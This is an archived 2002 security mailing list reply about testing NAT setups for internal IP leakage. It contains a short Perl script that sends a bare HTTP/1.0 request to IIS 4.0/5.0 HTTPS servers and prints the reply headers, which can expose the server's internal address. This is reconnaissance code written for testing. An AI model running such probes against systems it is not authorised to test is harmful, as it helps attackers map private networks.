RE: testing for IP address space leakage in NAT systems

From: Joshua Wright (Joshua.Wrightat_private)
Date: Tue Jan 22 2002 - 13:32:50 PST

    IIS is famous for revealing internal IP addresses.  Here is a perl snippet I
    have used to get information about the internal IP address from IIS 4.0 and
    5.0 HTTPS servers using the sslcat CPAN tool:

    #!/usr/bin/perl
    # referrer-addr.pl
    # Joshua.Wrightat_private
    use strict;
    use Net::SSLeay qw(sslcat);
    my $server;
    my @results;
    my $reply;
    my $i;
    my $port = "443";
    my $CRLF = "\x0d\x0a";

    unless (@ARGV == 1) {
        print "$0 - Discover internal IP of IIS Server with malformed\n";
        print " GET request.\n";
        print "Usage: $0 host\n";
        exit 1;
    }

    ($server) = @ARGV;
    $reply = sslcat($server, $port, "GET / HTTP/1.0$CRLF$CRLF");
    @results = split($CRLF,$reply);
    while ($i < 8) {
        print "$results[$i]\n";
        $i++;
    }
    print "<snip>\n\n";
    exit(0);

    Umm, I am seeing silly things I did in this code already.  Live and learn;
    use at your own risk.

    -Joshua Wright
    Team Leader, Networks and Systems
    Johnson & Wales University